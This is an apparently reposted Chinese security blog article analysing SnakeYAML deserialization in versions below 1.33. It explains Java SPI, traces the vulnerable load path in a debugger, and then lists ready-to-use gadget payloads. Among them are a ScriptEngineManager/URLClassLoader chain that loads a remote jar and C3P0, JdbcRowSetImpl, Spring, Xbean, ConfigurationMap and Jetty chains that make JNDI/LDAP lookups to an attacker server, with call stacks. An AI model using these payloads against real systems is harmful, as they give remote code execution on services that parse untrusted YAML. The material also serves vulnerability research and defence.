前言

SnakeYaml是Java中解析yaml的庫(kù)，而yaml是一種人類可讀的數(shù)據(jù)序列化語(yǔ)言，通常用于編寫(xiě)配置文件等。yaml真是到哪都有啊。

環(huán)境搭建

<dependency>
  <groupId>org.yaml</groupId>
  <artifactId>snakeyaml</artifactId>
  <version>1.32</version>
</dependency>

SPI機(jī)制

介紹

SPI機(jī)制就是，服務(wù)端提供接口類和尋找服務(wù)的功能，客戶端用戶這邊根據(jù)服務(wù)端提供的接口類來(lái)定義具體的實(shí)現(xiàn)類，然后服務(wù)端會(huì)在加載該實(shí)現(xiàn)類的時(shí)候去尋找該服務(wù)即META-INF/services/目錄里的配置文件中指定的類。這就是SPI和傳統(tǒng)的API的區(qū)別，API是服務(wù)端自己提供接口類并自己實(shí)現(xiàn)相應(yīng)的類供客戶端進(jìn)行調(diào)用，而SPI則是提供接口類和服務(wù)尋找功能、具體的實(shí)現(xiàn)類由客戶端實(shí)現(xiàn)并調(diào)用。

例子

準(zhǔn)備一個(gè)接口

package com.ctf.Impl;

public interface Shopping {
    String buyMask();
}

準(zhǔn)備兩個(gè)實(shí)現(xiàn)類

package com.ctf;

import com.ctf.Impl.Shopping;

public class BuyN95 implements Shopping {
    @Override
    public String buyMask() {
        return "Buy N95";
    }
}

package com.ctf;

import com.ctf.Impl.Shopping;

public class BuyNormal implements Shopping {
    @Override
    public String buyMask() {
        return "Buy Normal";
    }
}

在resources目錄下新建目錄META-INF/services，在services目錄下建一個(gè)配置文件，配置文件名為接口類的路徑+名稱，比如我的就是com.ctf.Impl.Shopping，寫(xiě)入兩個(gè)實(shí)現(xiàn)類路徑

然后把項(xiàng)目打包成jar包，File >> Project Structure >> Artifacts >> + >> JAR >> From modules with dependencies，記得選擇把META-INF添加，Build Artifacts

out目錄下有jar包，這時(shí)新建一個(gè)項(xiàng)目，把生成的jar包作為依賴導(dǎo)入

我們可以把上面生成的jar包理解為客戶端用戶根據(jù)SPI接口自己定義了一套實(shí)現(xiàn)并打包成jar，然后下面寫(xiě)入的測(cè)試代碼，就是服務(wù)端的代碼，服務(wù)端引入了jar包和其中的META-INF/services下的配置文件，通過(guò)ServiceLoader.load執(zhí)行了相關(guān)操作。

Setter

準(zhǔn)備一個(gè)POJO

package com.ctf.POJO;

public class User {

    String name;
    int age;

    public User() {
        System.out.println("User構(gòu)造函數(shù)");
    }

    public String getName() {
        System.out.println("User.getName");
        return name;
    }

    public void setName(String name) {
        System.out.println("User.setName");
        this.name = name;
    }

    public int getAge() {
        System.out.println("User.getAge");
        return age;
    }

    public void setAge(int age) {
        System.out.println("User.setAge");
        this.age = age;
    }
}

序列化流程

package com.ctf;

import com.ctf.POJO.User;
import org.yaml.snakeyaml.Yaml;

public class SetterPoc {
    public static void main(String[] args) {
        User user = new User();
        user.setName("F12");
        user.setAge(20);
        String str = serialize(user);
        System.out.println(str);
    }
    public static String serialize(Object obj){
        Yaml yaml = new Yaml();
        return yaml.dump(obj);
    }
    public static String unserialize(String str){
        Yaml yaml = new Yaml();
        return yaml.load(str);
    }
}

getter和setter都調(diào)用了

反序列化流程

package com.ctf;

import com.ctf.POJO.User;
import org.yaml.snakeyaml.Yaml;

public class SetterPoc {
    public static void main(String[] args) {
        User user = new User();
        user.setName("F12");
        user.setAge(20);
        //        String str = serialize(user);
        //        System.out.println(str);
        unserialize("!!com.ctf.POJO.User {age: 20, name: F12}");
    }
    public static String serialize(Object obj){
        Yaml yaml = new Yaml();
        return yaml.dump(obj);
    }
    public static String unserialize(String str){
        Yaml yaml = new Yaml();
        return yaml.load(str);
    }
}

只調(diào)用了setter

SnakeYaml反序列化漏洞

影響版本：1.33以下的全版本

攻擊測(cè)試

github有個(gè)寫(xiě)好的SPI：https://github.com/artsploit/yaml-payload/tree/master，打包成jar包就行

package com.ctf;

import org.yaml.snakeyaml.Yaml;

public class POC {
    public static void main(String[] args) {
        String poc = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://localhost:8000/yaml-payload.jar\"]]]]";
        Yaml yaml = new Yaml();
        yaml.load(poc);
    }
}

流程分析

load處打斷點(diǎn)，跟進(jìn)

跟進(jìn)loadFromReader

跟進(jìn)getSingleData

這里對(duì)tag進(jìn)行了修改，變?yōu)橐环Nyaml規(guī)范的格式，這個(gè)是個(gè)重點(diǎn)，先記住，跟進(jìn)constructDocument方法


跟進(jìn)constructObject方法

跟進(jìn)check

可以看出是要準(zhǔn)備實(shí)例化了，進(jìn)入constructor.construct

繼續(xù)跟進(jìn)construct，代碼有點(diǎn)多，看重點(diǎn)代碼

for (Node argumentNode : snode.getValue()) {
    Class<?> type = c.getParameterTypes()[index];
    // set runtime classes for arguments
    argumentNode.setType(type);
    argumentList[index++] = constructObject(argumentNode);
}

這里value有一個(gè)嵌套，他會(huì)一層層的往里去實(shí)例化，最后分別作為各自的參數(shù)，比如UrlClassLoader是ScriptEngine的參數(shù)，Url是UrlCLassLoader的參數(shù)。然后實(shí)例化的順序是從URL->URLCLASSLOADER->ScriptEngine順序去實(shí)例化的

最后會(huì)實(shí)例化

因?yàn)橛袀€(gè)迭代，迭代完才能到這里實(shí)例化，所以我們直接在ScriptEngineManage的實(shí)例化方法給斷點(diǎn)

跟進(jìn)init方法

跟進(jìn)initEngines方法

這里調(diào)用ServiceLoader

這里就會(huì)去加載用戶自定義的實(shí)現(xiàn)類，也就會(huì)觸發(fā)我們寫(xiě)的惡意類

男男搭配，干活不累

干活不累，但是調(diào)試很累，所以師傅們自己調(diào)試吧，就不寫(xiě)上面了

SnakeYaml+C3P0

之前研究過(guò)C3P0，有兩條鏈，不出網(wǎng)的是HEX，出網(wǎng)的是JNDI，放payload

JNDI（對(duì)應(yīng)setJndiName）

!!com.mchange.v2.c3p0.JndiRefForwardingDataSource
  jndiName: "ldap://localhost:1099/Exploit"
  loginTimeout: 0

HEX（對(duì)應(yīng)實(shí)例化方法）

!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource
  userOverridesAsString: "HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400074578706c6f6974740016687474703a2f2f6c6f63616c686f73743a383030302f740003466f6f;"

SnakeYaml+JdbcRowSetImpl

!!com.sun.rowset.JdbcRowSetImpl
  dataSourceName: "ldap://localhost:1389/Exploit"
  autoCommit: true

SnakeYaml+PropertyPathFactoryBean

!!org.springframework.beans.factory.config.PropertyPathFactoryBean
  targetBeanName: "ldap://localhost:1389/Exploit"
  propertyPath: mi1k7ea
  beanFactory: !!org.springframework.jndi.support.SimpleJndiBeanFactory
                 shareableResources: ["ldap://localhost:1389/Exploit"]

調(diào)用棧

lookup:92, JndiLocatorSupport (org.springframework.jndi)
doGetSingleton:220, SimpleJndiBeanFactory (org.springframework.jndi.support)
getBean:113, SimpleJndiBeanFactory (org.springframework.jndi.support)
getBean:106, SimpleJndiBeanFactory (org.springframework.jndi.support)
setBeanFactory:196, PropertyPathFactoryBean (org.springframework.beans.factory.config)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:497, Method (java.lang.reflect)
set:77, MethodProperty (org.yaml.snakeyaml.introspector)
constructJavaBean2ndStep:263, Constructor$ConstructMapping (org.yaml.snakeyaml.constructor)
construct:149, Constructor$ConstructMapping (org.yaml.snakeyaml.constructor)
construct:309, Constructor$ConstructYamlObject (org.yaml.snakeyaml.constructor)
constructObjectNoCheck:216, BaseConstructor (org.yaml.snakeyaml.constructor)
constructObject:205, BaseConstructor (org.yaml.snakeyaml.constructor)
constructDocument:164, BaseConstructor (org.yaml.snakeyaml.constructor)
getSingleData:148, BaseConstructor (org.yaml.snakeyaml.constructor)
loadFromReader:525, Yaml (org.yaml.snakeyaml)
load:453, Yaml (org.yaml.snakeyaml)

SnakeYaml+DefaultBeanFactoryPointcutAdvisor

!!org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor
  adviceBeanName: "ldap://localhost:1389/Exploit"
  beanFactory: !!org.springframework.jndi.support.SimpleJndiBeanFactory
                 shareableResources: ["ldap://localhost:1389/Exploit"]

SnakeYaml+Xbean

!!javax.management.BadAttributeValueExpException[!!org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding ["foo",!!javax.naming.Reference [foo, "Exploit", "http://localhost:8000/"],!!org.apache.xbean.naming.context.WritableContext []]]

這個(gè)使用BadAttibute的構(gòu)造方法觸發(fā)Xbean的toString

SnakeYaml+ConfigurationMap

!!org.apache.commons.configuration.ConfigurationMap [!!org.apache.commons.configuration.JNDIConfiguration [!!javax.naming.InitialContext [], "ldap://127.0.0.1:9999/Evil"]]

調(diào)用棧：文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-855600.html

getObjectFactoryFromReference:146, NamingManager (javax.naming.spi)
getObjectInstance:189, DirectoryManager (javax.naming.spi)
c_lookup:1085, LdapCtx (com.sun.jndi.ldap)
p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx)
lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx)
lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)
lookup:94, ldapURLContext (com.sun.jndi.url.ldap)
lookup:417, InitialContext (javax.naming)
getBaseContext:452, JNDIConfiguration (org.apache.commons.configuration)
getKeys:203, JNDIConfiguration (org.apache.commons.configuration)
getKeys:182, JNDIConfiguration (org.apache.commons.configuration)
<init>:161, ConfigurationMap$ConfigurationSet$ConfigurationSetIterator (org.apache.commons.configuration)
<init>:154, ConfigurationMap$ConfigurationSet$ConfigurationSetIterator (org.apache.commons.configuration)
iterator:207, ConfigurationMap$ConfigurationSet (org.apache.commons.configuration)
hashCode:528, AbstractMap (java.util)
constructMapping2ndStep:366, BaseConstructor (org.yaml.snakeyaml.constructor)
constructMapping2ndStep:147, SafeConstructor (org.yaml.snakeyaml.constructor)
constructMapping:354, BaseConstructor (org.yaml.snakeyaml.constructor)
construct:489, SafeConstructor$ConstructYamlMap (org.yaml.snakeyaml.constructor)
constructObject:182, BaseConstructor (org.yaml.snakeyaml.constructor)
constructDocument:141, BaseConstructor (org.yaml.snakeyaml.constructor)
getSingleData:127, BaseConstructor (org.yaml.snakeyaml.constructor)
loadFromReader:450, Yaml (org.yaml.snakeyaml)
load:369, Yaml (org.yaml.snakeyaml)

SnakeYaml+Jetty

[!!org.eclipse.jetty.plus.jndi.Resource ["__/obj", !!javax.naming.Reference ["foo", "Exploit", "http://localhost:8000/"]], !!org.eclipse.jetty.plus.jndi.Resource ["obj/test", !!java.lang.Object []]]

<init>:2, Exploit
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:62, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:422, Constructor (java.lang.reflect)
newInstance:442, Class (java.lang)
getObjectFactoryFromReference:163, NamingManager (javax.naming.spi)
getObjectInstance:319, NamingManager (javax.naming.spi)
lookup:503, NamingContext (org.eclipse.jetty.jndi)
lookup:578, NamingContext (org.eclipse.jetty.jndi)
bind:69, NamingUtil (org.eclipse.jetty.jndi)
save:202, NamingEntry (org.eclipse.jetty.plus.jndi)
<init>:39, Resource (org.eclipse.jetty.plus.jndi)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:62, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:422, Constructor (java.lang.reflect)
construct:548, Constructor$ConstructSequence (org.yaml.snakeyaml.constructor)
construct:309, Constructor$ConstructYamlObject (org.yaml.snakeyaml.constructor)
constructObjectNoCheck:216, BaseConstructor (org.yaml.snakeyaml.constructor)
constructObject:205, BaseConstructor (org.yaml.snakeyaml.constructor)
constructSequenceStep2:376, BaseConstructor (org.yaml.snakeyaml.constructor)
constructSequence:360, BaseConstructor (org.yaml.snakeyaml.constructor)
construct:499, SafeConstructor$ConstructYamlSeq (org.yaml.snakeyaml.constructor)
constructObjectNoCheck:216, BaseConstructor (org.yaml.snakeyaml.constructor)
constructObject:205, BaseConstructor (org.yaml.snakeyaml.constructor)
constructDocument:164, BaseConstructor (org.yaml.snakeyaml.constructor)
getSingleData:148, BaseConstructor (org.yaml.snakeyaml.constructor)
loadFromReader:525, Yaml (org.yaml.snakeyaml)
load:453, Yaml (org.yaml.snakeyaml)

到了這里，關(guān)于SnakeYaml反序列化分析的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！